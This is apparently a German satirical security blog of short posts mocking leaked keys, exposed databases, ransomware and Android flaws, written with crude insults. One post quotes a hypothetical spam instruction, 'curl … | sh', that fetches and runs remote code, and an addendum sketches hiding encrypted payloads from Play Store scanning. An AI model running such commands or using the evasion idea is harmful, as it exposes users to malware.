Krüpplografie des tages

Wieder mal so ein facepalm, für den man hundert hände brauchte: meikrosoft „outlook“ kann zwar S/MIME-kryptografie und kriegt die auch durchaus korrekt hin, hängt dann aber noch einmal den unverschlüsselten klartext mit an, so dass man sich das verschlüsseln gleich hätte sparen können.

Weia! [via Fefe]

Advertisements

Spezjalexperten des jahres

Das Logo von Adobe Creative Cloud mit dem Text 'Allseitig Abregnende Wolke'.

Für den facepalm brauchste hundert hände! Das „product security incident response team“ von „adobe“ auf einem seiner blogs so: BEGIN PRIVATE KEY BLOCK. m(

Bild eins, bild zwei, bild drei, archivversjon aus dem guhgell-zwischenspeicher, kwelle beim zwitscherchen, via Fefe… und natürlich ist der key schon zurückgezogen.

Nachtrag 23. september, 12:20 uhr: Golem erklärt uns mal allen, wie es dazu kommen konnte, dass für security-tätigkeiten bezahlte security-spezjalexperten bei „adobe“ ihren private key irgendwo markiert, kopiert und in ihr CMS eingefügt haben. Das lag nicht etwa daran, dass die einen ziemlich peinlichen fehler gemacht haben, der auf dummheit oder drogengebrauch schließen lässt, das lag vor allem daran, dass PGP oder GnuPG nicht benutzerfreundlich genug sind:

PGP gilt nicht als übertrieben benutzerfreundlich. Warum, musste jetzt auch Adobe feststellen, als ein Mitarbeiter im Sicherheitsblog des Unternehmens den privaten PGP-Schlüssel des Teams veröffentlichte

Dabei benutzt man bei „adobe“ — übrigens das englische wort für einen luftgetrockneten lehmziegel — schon eine äußerst klickige und benutzerfreundliche softwäjhr:

Die Kombination aus öffentlichem und privatem Schlüssel wurde mit dem Browser-Plugin Mailvelope exportiert

Es geht doch nix über die anwendung im webbrauser! :mrgreen:

An der kommandozeile wäre das nämlich nicht passiert, da muss man schon etwas umständlich --export-secret-keys oder in härtefällen auch mal --export-secret-subkeys tippen. Und das ist auch gut so, dass das nicht aus versehen passieren kann.

Wieviel reklamegeld golem wohl von „adobe“ bekommt? ❓

Cyber cyber des tages

Jetzt wird auch bei heise onlein abgecybert, dass das hirnchen schmerzen kriegt:

Für eine Handvoll Dollar bieten Online-Shops spezielle Geräte an, die sich für perfide Angriffe auf Rechner, Smartphones und Netzwerke eignen […] in den falschen Händen werden diese Geräte jedoch zu gefährlichen Cyber-Waffen

Cyber-waffen!!ölf!1!!!1! Vielleicht sollte jemand den autor dieser miesen zeilen mal sagen, dass — wenn so etwas eine pöse und gefährliche cyber-waffe ist — auch ein handelsüblicher hammer eine pöse und gefährliche cyber-waffe ist, denn damit kann man auch ganz schön viel schaden an einer „cyberanlage“ (das wort von innimini Thomas de Maizière für einen kompjuter) anrichten, an die man rankommt. Eine andere fiese und schwere bedrohung für solche cyberanlagen sind etwa benzinkanister und feuerzeuge. Oder büroklammern, die man in lüftungsschlitze steckt. Es wird höchste zeit, dass diese hochgefährlichen cyber-massenvernichtungswaffen verboten werden!!1!!!!!!!1!

Das tintengeklexe des offenbar komplett ahnungslosen praktikanten oder gesetzlich erzwungenen kwotenidjoten wird noch besser:

Viele der Hacking-Gadgets beherrschen überraschende IT-Angriffe, vor denen kein Virenscanner schützen kann

Antivirus-schlangenöl schützt nicht vor hardwäjhrangriffen! Gut, dass das mal ein richtiger fachjornalist klargestellt hat!!1!!!1! m(

Echt jetzt, heise?! Wollt ihr mit der kompjuterbild fusjonieren? 😦

Merkt euch: immer, wenn ihr irgendwo „cyber“ lest oder hört, wird nur bullschitt gelabert.

Ändräut des tages

Stellt euch mal vor, ihr benutzt ein schlangenöl, mit dem ihr dafür sorgt, dass nicht irgendwelche trojaner an wirklich empfindliche daten rankommen — sowas wie die kronjuwelen, also private schlüssel, biometrische daten und dergleichen. Natürlich muss dieses schlangenöl aktualisierbar sein, denn auch in schlangenöl sind ja gern mal dicke fehler drin. Und dann stellt euch weiterhin einmal vor, dass diese schnittstelle zum aktualisieren des schlangenöles so totalverkackt implementiert wurde, dass die trojaner einfach eine ältere versjon des schlangenöles einspielen können, die noch eine sicherheitslücke hatte, die die trojaner ausnutzen konnten — und dann werden durch ausnutzen einer längst gestopften sicherheitslücke daten geschaufelt, bis die leitung kwalmt. Wo es so eine unglaubliche, dumme, nutzlose krüppelscheiße gibt? In ändräut-wischofonen (auch der gehobenen preisklasse) gibt es regelmäßig so eine unglaubliche, dumme, nutzlose krüppelscheiße.

Die Hersteller können zwar Patches für verwundbaren Code verteilen, um mögliche Lücken zu schließen. Auf Android-Systemen hält aber offenbar weder Nutzer noch Angreifer prinzipiell nichts davon ab, alte und verwundbare Trustlets aus alten Firmware-Dateien wieder einzuspielen […] „Solange dies der Fall bleibt, werden Mängel in TEEs so viel wertvoller für Angreifer sein, da Schwachstellen, die einmal gefunden wurden, die TEE des Gerätes für immer kompromittieren“

Weia! 😯

Und klar kann man damit ein ändräut-wischofon komplett übernehmen und alles mögliche damit machen. So ist das eben, wenn die tinnefverkäufer euch die root-rechte auf euren persönlichen kompjutern verweigern und euch die gewährleistung entziehen, wenn ihr auf eurem eigenen kompjuter die softwäjhr laufen lassen wollt, die ihr selbst für richtig haltet. Wenn den besitzern der geräte root verweigert wird, dann haben eben vor allem die verbrecher root. Ist halt eine scheißkultur, die entsteht, wenn ihr euch von irgendwelchen kaufleuten mit irgendwelchen analsadistischen technikverhinderungen enteignen lasst. Die einzigen, die davon — neben den scheißkaufleuten, die für eine künstliche produktalterung sorgen — profitieren, sind die verbrecher.

Ich wünsche auch weiterhin allen menschen viel spaß bei der fernkontoführung mit dem händi: modern, schnell, einfach und überall, jetzt mit der praktischen, voll sicheren äpp ihrer bank! Was kann dabei schon passieren?! :mrgreen:

Händi des tages

Stell dir mal vor, du hängst richtig in der scheiße und brauchst hilfe, greifst nach deinem wischofon, wählst eine verdammte notrufnummer und dein scheißwischofon stürzt ab, und zwar reproduzierbar, wenn du die notrufnummer wählst

Na ja, wenigstens kann du dir dann die restzeit bis zu deinem ableben mit dem fratzenbuch versüßen. Zum telefonieren sind die scheißdinger doch gar nicht mehr gebaut.

Macht hier jemand fernkontoführung auf seinem kompjuter?

Echt? Und, schon gelesen, was die spezjalexperten von der sparda-bank über kompjutersicherheit von sich geben (hervorhebung von mir):

Zudem ist es prinzipiell egal wie lange das Passowrt ist, denn in der Regel hat der Kunde einen Keylogger auf seinem Rechner installiert. Dieser würde dann auch ein Passwort mit unbegrenzter Länge und Komplexität mit lesen

Daran glauben, dass nahezu jeder kunde (denn es ist ja die regel) einen trojaner auf dem rechner hat, der die tastatureingaben mitschneidet und trotzdem noch die fernkontoführung über das internetz anbieten und in der reklame noch einen von sicherheit faseln — diesen intellektuellen spagat kriegt man wohl nur als bänker hin. :mrgreen:

Die zusammenfassung von Mike Kuketz ist schon sehr gut:

Na wenn da so ist, können wir uns die Authentifizierung ja gleich sparen

Auch weiterhin viel spaß bei der internetzbasierten fernkontoführung und bei der scheibchenweisen abschaffung des bargeldes!

Datenschleuder des tages

Datenschleuder des tages ist die deutsche post, die rd. 200.000 anschriften ins offene web gestellt hat. Ein „häck“ war nicht erforderlich, um an diese daten zu kommen.

Tatsächlich war wirkliches Expertenwissen nicht nötig. Die Datenbank ließ sich einfach herunterladen. Dafür musste man nur ihren Dateinamen kennen, er lautete „dump.sql“ […] Warum dieser Dateiname verwendet wird, ist leicht zu erklären: In der Dokumentation der weit verbreiteten Datenbanksoftware MySQL wird er in einem Beispiel verwendet. Bei der Post hat jemand genau nach diesem Beispiel eine Kopie der Datenbank angelegt und offenbar versehentlich direkt auf dem Webserver abgelegt

Weia! Wohin man auch schaut, überall nur spezjalexperten! Bei vormaligen staatsklitschen wie der deutschen post reicht die kwalifikazjon „spezjalexperte“ offenbar schon aus, um die websörver nebst zugehörigen produkzjonsdatenbanken zu administrieren… 😦

Und hej, im verlinkten zeit-artikel gibts noch mehr datenschleudern, die genau das gleiche gemacht haben. Onlein-apoteken zum beispiel, die für 600.000 leute veröffentlicht haben, welche medikamente sie bestellt haben.

Ich wünsche auch weiterhin viel spaß beim festen und unerschütterlich gläubigen glauben an den überall völlig folgenlos und unter ausschluss jeglicher haftungspflicht versprochenen datenschutz, gern auch mit allerlei datenschutz-siegeln, die in webseits eingebettet sind. Die liste wäxt und wäxt und wäxt.

Kwalitätsjornalisten erklären kompjutertechnik

Ein Gif, die Abkürzung steht für Graphics Interchange Format, ist ein meist extrem kurzes Video. Es zeigt in Dauerschleife nur einige wenige Bilder, häufig ohne Ton

Kopf-Tisch, Kopf-Tisch

via @tux@pod.geraspora.de | Dauerhafte archivversjon, damit dieses glanzstück des kwalitätsjornalismus auch niemals verloren gehe… und nein, ich glaube nicht, dass sich diese wegwerftextschreiber bei temen, von denen ich zufällig gar nichts weiß, auch nur eine spur besser auskennen als beim tema „GIF-bilder“.

Datenschutz von gesundheitsdaten des tages

Reklame einer Apotheke in einer Tageszeitung. 97% Lieferfähigkeitszugage für Stammkunden mit Rezept. Fehlende Arzneimittel werden per Bote zugestellt. JETZT NEU! Rezepte fotografieren und über WhatsApp vorbestellen...

„Rezepte fotografieren und über whatsäpp vorbestellen“ — hej leute, die ihr so eine datenschutzverachtende drexkacke von hirnlosen scheißapotekern hinnehmt und flugs eure rezepte mit dem wischofon knipst: Erich Mielke wäre ja so stolz auf euch gewesen!

Wenns internetz im händi ist, ists gehirn im arsch. Ich wünsche der generazjon fratzenbuch viel spaß dabei, auch noch die verschreibungen ihres arztes beim fratzenbuch abzuliefern — und dem apoteker, der dieses angebot allen erstes macht, wünsche ich, dass er ganz schnell den insolvenzverwalter kennenlerne! Bevor noch größerer schaden entsteht!

Sicherheitsproblem des tages

Wer auf die Mail hereinfällt und das PDF öffnet, fängt sich Jaff aber noch nicht ein. Erst muss man in der PDF-Anwendung eine Sicherheitswarnung mit einem Klick auf „OK“ abnicken. Anschließend wird ein Word-Dokument mit Makros aus dem PDF extrahiert und geöffnet. Nun muss ein Opfer noch die Makros aktivieren. Erst dann findet die Infektion mit Jaff statt

Sorry, aber wer das macht, kann auf mein mitleid nicht mehr rechnen. Nach so viel mühe hat man sich den erpressungstrojaner aber auf anständige weise selbst verdient. Bei so viel konzentriertem informazjonstechnischen analfabetismus an den tasten hilft auch das sicherste betrübssystem nicht weiter. Wenn man derartige vollpfosten etwa vor einem un*xoiden system setzt und die kriegen da eine spämm mit dem text: „unser voll sicheres sicherheitsverfahren zur erhöhung der sicherheit erfordert eine aktivierung an ihrer kommandozeile, damit sie die angehängten dokumente lesen können, bitte geben sie die anweisung curl http://example.net/blah/ | sh in einer konsole ein! Vielen dank für ihr verständnis!“ — die machen das! Und die kommen sich dabei noch wichtig und kompedingsda vor, weil sie eine tolle, sichere sicherheitszeile von hand abtippen können. (Das mit der zwischenablage werden sie wohl nicht verstehen, und dass man unter X seit rd. 25 jahren einfach mit der mittleren maustaste den woanders markierten text einfügen könnte, wissen sie auch nicht und werden sie auch nie lernen, denn sie brauchen es ja nicht zu wissen.) Die größte sicherheitslücke ist immer noch der digitale analfabet vor dem kompjuter, und dieser analfabet wird mit hohem aufwand systematisch hergestellt, weil man verdummten menschen, die angst vor eigenem wissen und können haben, einfach viel mehr zeugs verkaufen kann. Wischofone zum beispiel. Oder antivirus-schlangenöle. Oder lichtschalter mit internetz. Ach!

Nicht daten sind der rohstoff der zukunft. Dummheit ist der rohstoff der zukunft.

Ach, apropo dummheit: Warum — und vor allem wozu — im namen von drei schwefelkackenden höllenhunden kann man an ein PDF-dokument ein wörd-dokument anhängen? Was ist der intendierte anwendungsfall für dieses funkzjonsmerkmal? Und wie oft wird dieses funkzjonsmerkmal von anwendern genutzt? Wer sinnlos aufgeplusterte softwäjhr von klischen wie „adobe“ (engl. für: gebrannter lehmziegel) benutzt, setzt sich damit auch ziemlich überflüssigen risiken aus.

Ändräut-security-großalarm des jahres

Benutzt hier jemand ein wischofon mit ändräut?

Zwei App-Rechte des Android-Betriebssystems lassen sich missbrauchen, um einen universellen Keylogger zu bauen, der alles mitliest, was der Benutzer des Gerätes in die Tastatur tippt. Außerdem kann ein Angreifer sie dazu nutzen, einer bösartigen App unbeschränkte App-Rechte zu verschaffen

„Ist aber nicht weiter schlimm, weil man doch die rechte einer äpp bei der installazjon abnicken muss, da kann man ja erstmal drauf achten“, denkt da vielleicht der eine oder andere… doch, es ist so schlimm:

Da alle aus dem Play Store installierten Apps routinemäßig diese Berechtigung haben, muss der Nutzer sie nicht explizit abnicken

Denn jede äpp braucht ja die rechte, einen unsichtbaren layer über die oberfläche legen zu können. Wozu? Ach, geht einfach weiter, hier gibts nichts zu sehen! Aber immerhin, guhgell tut ja was dagegen:

Google verhindert nun allerdings, dass Apps, die sie ausnutzen, in den Play Store geladen werden

Ob es wohl einen halbwegs effizjenten test gibt, um das ausnutzen eines exploits aus dem bytekohd rauszukriegen und von einer legitimen nutzungsform zu unterscheiden? Sind ja nur ein paar hunderttausend äpps in der großen müllhalde des pläjhstohr. Und die „kreativität“ von kriminellen kann erheblich sein, wenn es darum geht, an so einer kontrolle vorbeizukommen. Denn die kriminellen leben davon.

Na ja, guhgell tut ja sonst so irre viel für die kompjutersicherheit. Zum beispiel, wenn guhgell einen exploit in anderen betrübssystemen oder anwendungen findet. Dann muss der binnen neunzig tagen gefixt werden, denn dann kommt es zur veröffentlichung. Gnadenlos. Da wird „don’t be evil“ doch sicherlich selbst auch genau so schnell ausbeutbare schwächen in seinem eigenen scheißsystem fixen, oder?

Da diese Probleme inhärent Teil des Berechtigungssystems von Android sind, kann Google sie nicht ohne weiteres beheben – obwohl die Firma bereits im August 2016 von den Forschern über die Lücken informiert wurde […] Mit der nächsten Hauptversion von Android (Android O) will man solche Angriffe dann gänzlich verhindern

Aber nein doch, für die ändräut-gutsherren von guhgell gelten da ganz andere maßstäbe. Da wird eine offene, ausbeutbare sicherheitslücke einfach eine kleine ewigkeit lang vom august des letzten jahres bis zur veröffentlichung der näxten ändräut-hauptversjon vorsätzlich und jeden anwender in gefahr bringend offen gehalten. Und unterdessen erzählen euch die leute, dass ihr mit euren scheißwischofonen eure fernkontoführung¹ machen und überall bezahlen sollt, ist ja alles voll sicher, da kann ja gar nix passieren. Und ihr glaubt denen auch noch. Hej, und denkt immer dran, dass ihr immer überall schön sichere passwörter verwendet, euch dann aber mit eurem möglicherweise für euch völlig unentdeckbar von einer trojanischen äpp gepwnten scheißwischofon anmeldet! Eine trojanische äpp, wohlgemerkt, die keine besonderen privilegjen braucht, um einen keylogger zu implementieren. Weia, was für eine riesengroße scheiße! Wie fühlt sich das an, wenn man ein betrübssystem von guhgell hat und von guhgell mit so einem planetensystemweit offenen scheuentor einfach im stich gelassen wird? Mit meikrosoft wäre das jedenfalls nicht passiert, die fixen bei ganz großen scheunentoren sogar noch ihr obsoletes windohs XP… :mrgreen:

Auch weiterhin viel spaß mit euren wischofonen, die die security-blauäugigkeit der neunziger jahre mit der technisch kompententen kriminalität der zehner jahre kombinieren! Ob euer jetzt benutztes wischofon jemals eine aktualisierung des betrübssystemes sehen wird? Fragt doch mal euren wischofon-hersteller, der euch viel lieber neue wischofone verkaufen möchte! Und dann kauft einfach ein neues! Ihr habt das geld ja, und gut für die wirtschaft ist es auch. Vielleicht kann man das neue wischofon sogar mal ein halbes jahr lang benutzen, ohne dass man dadurch zum verantwortungslosen vollidjoten wird. Und dann kommt die nächste katastrofenmeldung… 😦

Nachtrag: wie man guhgells skänn im pläjhstohr umgeht? Das ist nicht schwierig, sondern könnte ähnlich wie bei den werbebanner-klickbetrugs-trojanern gemacht werden.

Google verwendet zwar für seinen Play Store eine Technik namens Bouncer, um solche Adware aus dem Shop fern zu halten. Doch die Kiniwini-Software lädt die Malware-Funktionen offenbar erst nach, wenn die jeweilige App bereits installiert ist und sich abseits des Goolge-Shops bei ihrem Hersteller registriert hat

Wenn man aber als schadsoftwäjhr-progger überhaupt keinen internetz-zugriff machen will, dann gibts halt ein paar mitgelieferte daten (serialisierte java-objekte), die so verschlüsselt abgelegt werden, dass sie beim skänn unauffällig bleiben und die dann einfach geladen und ausgeführt werden. Und den kohd zum entschlüsseln kann man beliebig schwer analysierbar machen — was übrigens kein bisschen anders aussehen muss, als ein legitimer versuch, irgendwelche „häcks“ einer softwäjhr zu erschweren.

Je länger ich darüber nachdenke, desto unmöglicher kommt es mir vor, auszuschließen, dass diese sicherheitslücke von einer äpp im pläjhstore ausgebeutet wird. Was guhgell mit seinen skänn vorschlägt, ist eine beseitigung des problemes durch auftragen von schlangenöl statt durch ausräumen der ausbeutbaren ändräut-schwachstelle.

¹Scheißwerber sprechen von „online-banking“, weil das hipper klingt…

Kwalitätsjornalismus des tages

Ist es nicht herrlich dämlich, wie sich der norddeutsche schundfunk darüber freut, dass es jemanden gelungen ist, sich die domäjhn eines AFD-ortsverbandes zu grabschen und dort für die aufnahme von flüchtlingen zu werben. [Dauerhaft archivierte versjon…]

Was der werte jornalist im eifer seines schreibens allerdings übersehen haben dürfte: Der mensch, der das gemacht hat, ist damit ein gehöriges finanzjelles risiko eingegangen. Natürlich gehören der AFD die namensrechte für ihre partei, selbst, wenn diese nicht beim deutschen patent- und markenamt eingetragen sein sollten (was ich nicht glaube). Eine auf dem rechtsweg erzwungene herausgabe der domäjhn ist also eine verhältnismäßig sichere sache, und die streitwerte, die im markenrecht „standard“ sind, führen zusätzlich zu sehr hohen kosten. Praktisch immer ist der streitwert sexstellig.

Wer mir das nicht glaubt und auch keine lust hat, eine internetz-suchmaschine zu benutzen, kann ja mal selbst ein paar erfahrungen machen: einfach eine irreführend benannte domäjhn mit SPD, CDU oder auch mal mit „BMW“, „cocacola“, „apple“ oder „NDR“ als namensbestandteil registrieren und auf einer webseit in dieser domäjhn das gegenteil der jeweiligen reklame publizieren, damit auch wirklich etwas dagegen unternommen wird! Da stecken aber ganz schnell sehr teure briefe im briefkasten, die zwar sachlich, aber auch klar und kalt formuliert sind und mindestens die kurzfristige herausgabe der domäjhn nebst unterzeichnung einer strafbewehrten unterlassungserklärung einfordern, natürlich mit angelegter kostennote einer anvergewaltskanzlei. So weit der preiswerte weg, der das konto „nur“ mit einigen tausend øre belastet. Der teure weg geht direkt und mit sehr guten erfolgsaussichten vor gericht. Wenn es ganz schlimm wird, kommen auf den markenrechtlichen kram auch noch schadenersatzforderungen drauf, deren streitwert sich das gegenüber mit der marke mehr oder minder einfach ausdenken kann (für beschädigung der marke durch arglistig erweckten falschen eindruck und alles, was dem beauftragten anvergewalt noch alles an gründen und möglichen schäden einfällt). Selbst, wenn man damit nicht durchkommt, gibt es wegen des vorsätzlich hochgeschraubten streitwertes ordentliche juristische zusatzkosten, die für eine privatperson existenzvernichtend sein können, von einem markeninhaber hingegen sogar steuerlich abgesetzt werden können. Alle diese dinge — die jeder gestalter einer webseit im rechtsraum der bummsrepublik deutschland im hinterkopf haben muss — werden vom kwalitätsjornalisten mit seiner „lustigen story gegen die AFD“ einfach weggewischt, als ob sie gar nicht existierten.

Aber hej, der kwantitätsjornalist wollte ja nur eine lustige meldung „gegen die AFD“ schreiben, und da wird dann mal kurz die gesamte wirklichkeit des geltenden rechtes in der BRD ausgeblendet. Wenns für den domäjhngrabscher teuer wird, wird der scheißjornalist bestimmt nicht drüber berichten. Jornalisten sind eben doof wie scheiße und — durch beständige desinformazjon mit potenzjell teuren folgen — die feinde ihrer leser, zuhörer und zuschauer.

Ich wünsche dem menschen, der sich bei einer günstigen gelegenheit die domäjhn eines AFD-ortsverbandes gegriffen hat und es damit „ins fernsehen“ geschafft hat, jedenfalls eine gütliche und für ihn billigere beilegung durch einigung mit der AFD.